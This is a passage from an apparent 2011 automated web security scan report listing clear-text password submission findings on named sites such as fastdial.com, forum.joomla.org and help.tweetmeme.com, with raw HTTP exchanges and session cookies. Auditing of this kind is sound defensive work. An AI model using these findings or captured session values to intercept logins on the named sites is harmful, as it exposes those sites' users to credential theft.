Set-Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.17. http://fastdial.com/0

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastdial.com
Path:   /0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field:
  • pass

Request

GET /0 HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5182
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.18. http://fastdial.com/user

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastdial.com
Path:   /user

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://fastdial.com/user
The form contains the following password field:
  • pass

Request

GET /user HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 4772
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

6.19. http://fastdial.com/website

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastdial.com
Path:   /website

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://fastdial.com/website?destination=website
The form contains the following password field:
  • pass

Request

GET /website HTTP/1.1
Host: fastdial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:05:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/website?destination=website" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.20. http://fastdial.com/welcome-fast-dial-firefox-4

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastdial.com
Path:   /welcome-fast-dial-firefox-4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field:
  • pass

Request

POST /welcome-fast-dial-firefox-4?destination=node%2F3 HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Referer: http://fastdial.com/
Cache-Control: max-age=0
Origin: http://fastdial.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81
Content-Length: 98

name=&pass=&op=Log+in&form_build_id=form-f79ff6c4b14a4b6ff80bfa544715655b&form_id=user_login_block

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><form action="/welcome-fast-dial-firefox-4?destination=node%2F3" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required error" />
</div>
...[SNIP]...

6.21. http://forum.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://forum.joomla.org/ucp.php?mode=login&sid=3b5661e788faab67f2027dc376b326d5
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=3b5661e788faab67f2027dc376b326d5; expires=Tue, 24-Jan-2012 15:11:53 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br clear="all" class="breakpad" />

   <form method="post" action="./ucp.php?mode=login&amp;sid=3b5661e788faab67f2027dc376b326d5">
   
   <table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.22. http://forum.joomla.org/ucp.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /ucp.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://forum.joomla.org/ucp.php?mode=login&sid=19d91383ba404ea6abc69bff18558c0e
The form contains the following password field:
  • password

Request

GET /ucp.php HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=19d91383ba404ea6abc69bff18558c0e; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />

<form action="./ucp.php?mode=login&amp;sid=19d91383ba404ea6abc69bff18558c0e" method="post">

<table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
<td>
               <input class="post" type="password" name="password" size="25" tabindex="2" />
               <br />
...[SNIP]...

6.23. http://forum.joomla.org/viewforum.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewforum.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://forum.joomla.org/ucp.php?mode=login&sid=37cbf4e15f54f7989d066007eee62641
The form contains the following password field:
  • password

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=37cbf4e15f54f7989d066007eee62641; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 124356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />

       <form method="post" action="./ucp.php?mode=login&amp;sid=37cbf4e15f54f7989d066007eee62641">

       <table class="tablebg" width="100%" cellspacing="1">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.24. http://forumas.lithuanianjoomla.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forumas.lithuanianjoomla.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://forumas.lithuanianjoomla.com/ucp.php?mode=login&sid=6bb0e598b965dee060e98ad373f62147
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache
Set-Cookie: phpbb3_9muwo_u=1; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_k=; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_sid=6bb0e598b965dee060e98ad373f62147; expires=Tue, 24-Jan-2012 22:35:40 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="lt-lt" xml:lang="lt-lt">
<head>
...[SNIP]...
</div>
       <form method="post" action="./ucp.php?mode=login&amp;sid=6bb0e598b965dee060e98ad373f62147" class="headerspace">
       <h3>
...[SNIP]...
</label>&nbsp;<input type="password" name="password" id="password" size="10" class="inputbox" title="Slapta..odis" />
                           | <label for="autologin">
...[SNIP]...

6.25. http://forums.freebsd.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.freebsd.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://forums.freebsd.org/login.php?do=login
The form contains the following password field:
  • vb_login_password

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:56 GMT
Server: Apache/2.2.17 (FreeBSD)
Set-Cookie: bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

6.26. http://help.tweetmeme.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.27. http://help.tweetmeme.com/2009/04/07/api-documentation/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.28. http://help.tweetmeme.com/2009/04/09/rss-feeds/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.29. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.30. http://help.tweetmeme.com/contact/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.31. http://help.tweetmeme.com/forum/forum/33

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /forum/forum/33

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /forum/forum/33 HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Content-Length: 6371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <meta http-equiv="Content-Type
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.32. http://help.tweetmeme.com/language/

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://help.tweetmeme.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<li>
<form action="http://help.tweetmeme.com/wp-login.php" method="post">
<fieldset>
...[SNIP]...
<label for="pwd">Password
<input type="password" name="pwd" id="pwd" size="22" class="text" /></label>
...[SNIP]...

6.33. http://it.toolbox.com/blogs/database-soup

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-soup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/database-soup
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/database-soup" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.34. http://it.toolbox.com/blogs/database-talk

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/database-talk

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/database-talk
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
</div>
